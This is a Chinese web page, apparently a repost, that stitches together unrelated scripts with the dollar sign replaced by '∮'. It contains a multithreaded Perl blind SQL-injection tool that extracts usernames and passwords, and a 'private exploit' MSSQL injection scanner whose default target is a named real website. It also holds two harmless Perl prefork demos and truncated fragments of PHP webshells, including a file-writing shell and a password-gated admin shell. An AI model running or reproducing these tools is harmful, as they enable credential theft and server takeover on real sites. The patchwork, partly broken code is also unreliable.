PERL:多线程+中文破解SQL注入猜解机
阐明:细致请把代码内的所有的∮都替换为$.
#!/usr/local/ActivePerl-5.8/bin/perl -w
use IO::Socket;
use threads;
#函数列表;
sub gethost
{
if(∮url=~/(http:\/\/)?(.+?)\/(.+)/)
{
∮host=∮2;
∮path='/'.∮3;
if(∮host=~/(.*):(.*)/)
{
∮host=∮1;
∮port=∮2;
}
}
}
sub fieInput
{
my ∮field;
open (fieInput,"∮_[0]") or die "can't open file!\n";
while (chomp(my ∮input=))
{
my ∮sql="exists%20(select%20∮input%20from%20∮table_user)";
∮path1 = "%20AND%20∮sql";
my @res = &connect;
if ("@res"=~/∮info/)
{
∮field=∮input;
print "\t+-- ∮field --+";
last;
}
}
close(fieInput);
return ∮field;
}
sub tabInput
{
my ∮table;
open (tabInput,"∮_[0]") or die "can't open file!\n";
while (chomp(my ∮input=))
{
my ∮sql="0<>(select%20count(*)%20from%20∮input)";
∮path1 = "%20AND%20∮sql";
my @res = &connect;
if ("@res"=~/∮info/)
{
∮table=∮input;
print "\t+-- ∮table --+\n";
last;
}
}
close(tabInput);
return ∮table;
}
sub connect
{
∮req = "GET ∮path∮path1 HTTP/1.0\n".
"Host: ∮host\n".
"Referer: ∮host\n".
"Cookie: \n\n";
my ∮connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>∮host,
PeerPort =>∮port) ││ die "Sorry! Could not connect to ∮host \n";
print ∮connection ∮req;
my @res = <∮connection>;
close ∮connection;
return @res;
}
sub crack
{
my(@dic) = @_;
my ∮sql=pop(@dic);
my ∮i=0;
my ∮op=1;
my ∮crack;
foreach my ∮pass(@dic)
{
print ">";
∮i++;
∮crack+=∮op*∮pass;
∮path1 = "%20AND%20∮crack<(∮sql)";
my @res = &connect;
if ("@res" =~ /∮info/)
{
∮op=1;
if(∮i==@dic)
{
∮crack++;
}
}
else
{
∮op=-1;
}
}
return ∮crack;
}
sub asc
{
my ∮asc=∮_[0];
my ∮str;
if (∮asc<256)
{
∮str = pack('C*',∮asc);
}
else
{
∮asc*=-1;
∮str = sprintf("%X",∮asc);
if (∮str=~/(.{4})∮/i)
{
∮str=∮1;
}
∮str = pack("H*",∮str);
}
return ∮str;
}
#初始化变量;
∮url='';
∮host='';
∮path='';
∮info='';
∮port=80;
@dic1=(128,64,32,16,8,4,2,1);
@dic2=(16,8,4,2,1);
@dic3=(64,32,16,8,4,2,1);
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1);
print "\n\n";
print "\t* The script Crack user&pass for Sql-injection system *\n";
print "\t* hemon @ East China Jiaotong Univercity , 2004.5 *\n";
print "\t* E-mail : the108one @ yahoo.com.cn QQ :24303484 *\n";
#取得主机地点、路径;
∮ARGC = @ARGV;
∮url = ∮ARGV[0];
∮info = ∮ARGV[1];
if (∮ARGC != 2)
{
print "\n\t* Please input the url : *\n";
chomp(∮url=);
print "\n\t* Please input the infomation : *\n";
chomp(∮info=);
}
&gethost;
print "\n\n开端在 ∮host 上举行测试,请等候......\n\n";
#猜解;
print "+-- Table --+";
∮table_user=&tabInput('table_user.txt');
print "+-- Filed --+";
my ∮thread1 = threads->create("fieInput","field_Username.txt");
my ∮thread2 = threads->create("fieInput","field_password.txt");
my ∮thread3 = threads->create("fieInput","field_id.txt");
∮field_Username = ∮thread1->join();
∮field_password = ∮thread2->join();
∮field_id = ∮thread3->join();
print "\n\n";
∮sql="select%20min(∮field_id)%20from%20∮table_user";
∮id=&crack(@dic1,"∮sql");
∮sql="select%20len(∮field_Username)%20from%20∮table_user%20where%20∮field_id=∮id";
my ∮thread4 = threads->create("crack",@dic2,∮sql);
∮sql="select%20len(∮field_password)%20from%20∮table_user%20where%20∮field_id=∮id";
my ∮thread5 = threads->create("crack",@dic2,∮sql);
∮userlen = ∮thread4->join();
∮passlen = ∮thread5->join();
for (my ∮locat=1;∮locat<=∮userlen;∮locat++)
{
∮sql="select%20asc(mid(∮field_Username,∮locat,1))%20from%20∮table_user%20where%20∮field_id=∮id";
∮path1 = "%20AND%200>(∮sql)";
my @res = &connect;
if ("@res" =~ /∮info/)
{
∮sql="select%20abs(asc(mid(∮field_Username,∮locat,1)))%20from%20∮table_user%20where%20∮field_id=∮id";
∮username[∮locat] = threads->create("crack",@dic4,∮sql);
}
else
{
∮username[∮locat] = threads->create("crack",@dic3,∮sql);
}
}
for (my ∮locat=1;∮locat<=∮passlen;∮locat++)
{
∮sql = "select%20asc(mid(∮field_password,∮locat,1))%20from%20∮table_user%20where%20∮field_id=∮id";
∮path1 = "%20AND%200>(∮sql)";
my @res = &connect;
if ("@res" =~ /∮info/)
{
∮sql="select%20abs(asc(mid(∮field_password,∮locat,1)))%20from%20∮table_user%20where%20∮field_id=∮id";
∮password[∮locat] = threads->create("crack",@dic4,∮sql);
}
else
{
∮password[∮locat] = threads->create("crack",@dic3,∮sql);
}
}
for (my ∮locat=1;∮locat<=∮userlen;∮locat++)
{
∮username[∮locat] = ∮username[∮locat]->join();
}
for (my ∮locat=1;∮locat<=∮passlen;∮locat++)
{
∮password[∮locat] = ∮password[∮locat]->join();
}
print "\n\n\t+-- ∮field_Username --+\t";
for (my ∮locat=1;∮locat<=∮userlen;∮locat++)
{
∮username[∮locat] = &asc(∮username[∮locat]);
print "∮username[∮locat]";
}
print "\n\t+-- ∮field_password --+\t";
for (my ∮locat=1;∮locat<=∮passlen;∮locat++)
{
∮password[∮locat] = &asc(∮password[∮locat]);
print "∮password[∮locat]";
}
print "\n\n";
system('pause');
=================
#!/usr/bin/perl
#Private Exploit!Don't distributed it!
∮|=1;
use Socket;
use Getopt::Std;
getopt('hpwtdi');
∮host=∮opt_h || "www.vod999.com";
∮port=∮opt_p || 80;
∮path=∮opt_w || "/movie_detail.asp?movie_m1id=1264";
∮type=∮opt_t || "table_scan";
∮database=∮opt_d;
∮tab_id=∮opt_i;
usage();
if(∮type eq "table_scan")
{
scan_db();
print "\nDatabase name scan complete!\n===================================\n";
foreach (@sqldb)
{
print "∮_\n";
}
print "===================================\n";
scan_table(@sqldb);
for(∮i=0;∮i<@sqldb;∮i++)
{
print "\n\n============== ∮sqldb[∮i] ==============\n\n";
@tb=split(/n/,∮table_name[∮i]);
@tbid=split(/n/,∮table_id[∮i]);
for(∮j=0;∮j<@tb;∮j++)
{
print "| ∮tb[∮j](∮tbid[∮j])\t";
}
}
}
elsif((∮type eq "column_scan") && (∮database ne "") && (∮tab_id ne ""))
{
scan_columns(∮database,∮tab_id);
print "\n============== ∮database.dbo.∮tab_id ==============\n\n";
foreach (@columns)
{
print "| ∮_\t";
}
}
sub sendraw {
my (∮req) = @_;
my ∮target;
∮target = inet_aton(∮host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,∮port,∮target)){
select(S);
∮| = 1;
print ∮req;
my @res = ;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
sub scan_db()
{
my ∮i=7;
my ∮req,∮get;
my ∮db=1;
my @res;
while(∮db ne "not found")
{
∮get=∮path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=∮i)";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮db=findstr(@res);
if(∮db ne "not found")
{
@sqldb=(@sqldb,∮db);
}
∮i++;
}
}
sub findstr
{
my @tmpres=@_;
my ∮tmpline;
my ∮s1,∮s2,∮s3;
foreach ∮tmpline (@tmpres)
{
if(∮tmpline=~/char 值.*转换/isg)
{
∮s1=0;
∮s2=0;
∮s3=0;
(∮s1,∮s2,∮s3)=split(/'/,∮tmpline);
∮s2=~s/ //isg;
print ".";
if(length(∮s2) > 1)
{
return ∮s2;
}
}
}
return "not found";
}
sub scan_table
{
my @db=@_;
my ∮req,∮get;
my ∮table=1;
my @res;
my ∮tmpstr1;
my ∮i=0;
my ∮tableid;
foreach ∮db_name (@db)
{
∮tmpstr1="";
∮table=1;
∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U')";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮table=findstr(@res);
∮table_name[∮i]=∮table_name[∮i]."∮table\n";
∮get=∮path."%20and%200<>(select%20count(*)%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='∮table'%20and%20uid>(str(id)))";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮tableid=findstr(@res);
∮table_id[∮i]=∮table_id[∮i]."∮tableid\n";
∮tmpstr1="'∮table'";
while(∮table ne "not found")
{
∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in(∮tmpstr1))";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮table=findstr(@res);
if(∮table ne "not found")
{
∮table_name[∮i]=∮table_name[∮i]."∮table\n";
∮get=∮path."%20and%200<>(select%20count(*)%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='∮table'%20and%20uid>(str(id)))";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮tableid=findstr(@res);
∮table_id[∮i]=∮table_id[∮i]."∮tableid\n";
}
∮tmpstr1=∮tmpstr1.",'∮table'";
}
print "\nDatabase \"∮db_name\" scan complete!\n";
∮i++;
}
}
sub scan_columns
{
my ∮this_db_name=shift;
my ∮this_table_id=shift;
my ∮get,∮req,∮tmpstr;
my @res;
∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮this_db_name.dbo.syscolumns%20where%20id=∮this_table_id)";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮column=findstr(@res);
@columns=(@columns,∮column);
∮tmpstr="'∮column'";
--------------------------------------------------------------------------------
while(∮column ne "not found")
{
∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮this_db_name.dbo.syscolumns%20where%20id=∮this_table_id%20and%20name%20not%20in(∮tmpstr))";
∮req= make_request(∮get);
@res=sendraw(∮req);
∮column=findstr(@res);
if(∮column ne "not found")
{
@columns=(@columns,∮column);
∮tmpstr=∮tmpstr.",'∮column'";
}
}
}
sub make_request
{
my ∮getstr=shift;
my ∮reqstr;
∮reqstr= "GET ∮getstr HTTP/1.0\r\n".
"HOST:∮host\r\n\r\n";
return ∮reqstr;
}
sub usage
{
print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask
===================================================
Usage: ∮0 -h [-p ] -w -t [-d -i ]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected "column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg: ∮0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
∮0 -h www.target.com -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
}
==============
#!/usr/bin/perl
use strict;
use IO::Select;
use POSIX qw(WNOHANG);
#---Define constants:界说准备先fork几个Process
use constant PREFORK_CHILDREN => 3;
# debugging information:表现历程
use constant DEBUG => 1;
# declare globals
my ∮DONE=0; # set flag to true when server done
my %STATUS = (); #child status information, child pid form keys of the ha
sh, status form the values
#--- 纪录所有Child Process的id...
my %CHILDREN = ();
#---Interrupt handles,跳出loop
∮SIG{TERM} = ∮SIG{INT}=∮SIG{HUP} = sub { ∮DONE++ };
#--- get CHLD Signal
∮SIG{CHLD} = sub {
while((my ∮child=waitpid(-1,WNOHANG)) > 0){
delete ∮CHILDREN{∮child};
}
};
# create a pipe for IPC:创建PIPE
pipe(CHILD_READ,CHILD_WRITE) or die "Can't make pipe!\n";
my ∮IN = IO::Select->new(\*CHILD_READ);
# prefork some children
make_new_child() for (1..PREFORK_CHILDREN);
# main loop
while(!∮DONE){
# avoid parent block in the I/O call
if (∮IN->can_read){ # got a message from one of the children
my ∮message;
next unless sysread(CHILD_READ,∮message,4096);
# may contain several messages
my @messages = split "\n",∮message;
# retrive every pid and status code
foreach (@messages){
next unless my (∮pid,∮status) = /^(\d+) (.+)∮/;
# change status
if(∮status ne "done"){
∮STATUS{∮pid} = ∮status;
}else{
# delete pid
delete ∮STATUS{∮pid};
}
}
}
warn join(' ',map {"∮_=>∮STATUS{∮_}"} keys %STATUS),"\n" if DEBUG;
last unless %CHILDREN
}
warn "Termination received, killing children\n" if DEBUG;
#-------------杀失所有Child Process
kill TERM => keys %CHILDREN;
sleep while %CHILDREN;
warn "Normal termination.\n";
exit 0;
#---- 创建新的Process
sub make_new_child{
die "can't fork :∮!" unless(defined( my ∮child = fork()));
if(∮child){ # child > 0, so we're the parent
∮CHILDREN{∮child} = 1;
warn "launching child ∮child\n" if DEBUG;
}else{
close CHILD_READ; # no need to read from pipe
do_child(); # child handles incoming connections
exit 0; # child is done
}
}
#------ child process
sub do_child{
# write status code: idle
syswrite CHILD_WRITE,"∮∮ idle\n";
for(1..1000000){ };
syswrite CHILD_WRITE,"∮∮ busy\n";
for(1..1000000){ };
syswrite CHILD_WRITE,"∮∮ done\n";
}
==============
#!/usr/bin/perl -w
# p_shm.pl
#---- 加载 module包罗IPC::Shareable
use strict;
use POSIX qw(WNOHANG);
use IPC::Shareable;
#---- 界说常数
use constant PREFORK_CHILDREN => 3;
#--- 界说识别文字
use constant SHM_GLUE => 'PERF';
#--- 查测历程
use constant DEBUG => 1;
#--- 宣告全域变量
my ∮DONE = 0; # set flag to true when server done
#--- 纪录CHILD的STATUS
my %STATUS = ();
my %CHILDREN=();
#--- 抓取Signal INT,TERM,ALRM----
∮SIG{INT} = ∮SIG{TERM}= sub{ ∮DONE++ };
∮SIG{ALRM} = sub {}; # receive alarm clock signals, but do nothing
#----抓取 signal : CHLD
∮SIG{CHLD} = sub {
while((my ∮child=waitpid(-1,WNOHANG)) > 0){
delete ∮CHILDREN{∮child};
}
};
# create a shared memory segment for child status
tie(%STATUS,'IPC::Shareable',SHM_GLUE,
{ create =>1,exclusive=>1,destroy=>1,mode=>0600})
or die "Can't tie \%STATUS to shared memory: ∮!";
# prefork some children
make_new_child() for(1..PREFORK_CHILDREN); # prefork children
#-- Main loop
while(!∮DONE){
sleep; # sleep until a signal arrives(alarm clock or child)
# get the list of idle children
warn join(' ',map{"∮_=>∮STATUS{∮_}"} keys %STATUS),"\n" if DEBUG;
unless(%CHILDREN){ last; }
}
warn "Termination received, killing children\n" if DEBUG;
#-------------杀失所有Child Process
kill TERM => keys %CHILDREN;
sleep while %CHILDREN;
warn "Normal termination.\n";
exit 0;
#---- 给launch_child cleanup child code
sub make_new_child{
die "can't fork :∮!" unless(defined( my ∮child = fork()));
if(∮child){ # child>0, so we're the parent
warn "launching child ∮child\n" if DEBUG;
∮CHILDREN{∮child} = 1;
}else{
do_child(); # child handles incoming connections
exit 0; # child is done
}
}
#--- 实行accept() loop fro each child ---
sub do_child{
my %status;
#--将%status与IPC::Shareable tie在一同
tie(%status,'IPC::Shareable', SHM_GLUE)
or die "Child ∮∮: can't tiel \%status to shared memory: ∮!";
#----见告Parent Process,child process 形态曾经改变
∮status{∮∮} ='idle'; kill ALRM=>getppid();
for(1..1000000){ }
#----见告Parent Process,child process 形态曾经改变
∮status{∮∮} ='busy'; kill ALRM=>getppid();
#----见告Parent Process,child process 形态曾经改变
for(1..1000000){ }
∮status{∮∮} = 'done'; kill ALRM=>getppid();
warn "child ∮∮: done\n" if DEBUG;
}
#---- delete the child's PID from %STATUS.
sub cleanup_child{
my ∮child=shift;
delete ∮STATUS{∮child};
}
======================
error_reporting(7);
// 容许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
∮onoff = ini_get('register_globals');
} else {
∮onoff = get_cfg_var('register_globals');
}
if (∮onoff != 1) {
@extract(∮_POST, EXTR_SKIP);
}
// 去除本义字符
// 可以解决magic_quotes_gpc的限制
function stripslashes_array(&∮array) {
while (list(∮key,∮var) = each(∮array)) {
if (∮key != 'argc' && ∮key != 'argv' && (strtoupper(∮key) != ∮key || ''.intval(∮key) == "∮key")) {
if (is_string(∮var)) {
∮array[∮key] = stripslashes(∮var);
}
if (is_array(∮var)) {
∮array[∮key] = stripslashes_array(∮var);
}
}
}
return ∮array;
}
// 果断目录权限
function dir_writeable(∮dir) {
if (!is_dir(∮dir)) {
@mkdir(∮dir, 0777);
}
if(is_dir(∮dir)) {
if (∮fp = @fopen("∮dir/test.test", 'w')) {
@fclose(∮fp);
@unlink("∮dir/test.test");
∮writeable = 1;
} else {
∮writeable = 0;
}
}
return ∮writeable;
}
// 果断 magic_quotes_gpc 形态
if (get_magic_quotes_gpc()) {
∮_POST = stripslashes_array(∮_POST);
}
// 果断目录权限
if (dir_writeable(str_replace('\\','/',dirname(__FILE__)))) {
∮dir_writeable = '可写';
} else {
∮dir_writeable = '不可写';
}
// 实行操纵
if (∮_POST['action']=="create") {
if (file_exists(∮_POST['filename'])) {
echo "";
echo "";
exit;
} else {
∮fp=@fopen("".∮_POST['filename']."","wb");
∮content = ∮_POST['filedate'];
∮fw=@fwrite(∮fp,∮content);
if (∮fw) {
echo "";
} else {
echo "";
}
@fclose(∮fp);
}
}
?>
SaPHPShell Version 1.0
if (!get_cfg_var("safe_mode")){
?>
}
?>
Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved. Get the latest version at
href="http://www.4ngel.net" target="_blank">www.4ngel.net.
Powered by SaPHPShell Version 1.5
===================
error_reporting(7);
ob_start();
∮mtime = explode(' ', microtime());
∮starttime = ∮mtime[1] + ∮mtime[0];
/*===================== 程序配置 =====================*/
// 是否必要暗码验证,1为必要验证,其他数字为间接进入.上面选项则无效
∮admin['check']="1";
// 验证方式,1为接纳 Session 验证,其他数字则接纳 Cookie验证
// 默许接纳 Session 验证,要是不克不及正常登岸,建议改为 Cookie验证
∮admin['checkmode']="1";
// 要是必要暗码验证,请修改登岸暗码
∮admin['pass']="angel";
/*===================== 配置竣事 =====================*/
// 容许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
∮onoff = ini_get('register_globals');
} else {
∮onoff = get_cfg_var('register_globals');
}
if (∮onoff != 1) {
@extract(∮_POST, EXTR_SKIP);
@extract(∮_GET, EXTR_SKIP);
}
/*===================== 身份验证 =====================*/
if(∮admin['check']=="1") {
if(∮admin['checkmode']=="1") {
/*------- session 验证 -------*/
session_start();
if (∮_GET['action'] == "logout") {
session_destroy();
echo "";
echo "注销成功......三秒后主动加入或单击这里加入程序界面>>>
";
exit;
}
--------------------------------------------------------------------------------
if (∮_POST['action'] == "login") {
∮adminpass=trim(∮_POST['adminpass']);
if (∮adminpass==∮admin['pass']) {
∮_SESSION['adminpass'] = ∮admin['pass'];
echo "";
echo "登岸成功......三秒后主动跳转或单击这里进入程序界面>>>
";
exit;
}
}
if (session_is_registered('adminpass')) {
if (∮_SESSION['adminpass']!=∮admin['pass']) {
loginpage();
}
} else {
loginpage();
}
} else {
/*------- cookie 验证 -------*/
if (∮_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "";
echo "注销成功......三秒后主动加入或单击这里加入程序界面>>>
";
exit;
}
if (∮_POST['action'] == "login") {
∮adminpass=trim(∮_POST['adminpass']);
if (∮adminpass==∮admin['pass']) {
setcookie ("adminpass",∮admin['pass'],time()+(1*24*3600));
echo "";
echo "登岸成功......三秒后主动跳转或单击这里进入程序界面>>>
";
exit;
}
}
if (isset(∮_COOKIE['adminpass'])) {
if (∮_COOKIE['adminpass']!=∮admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
}//end check
文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
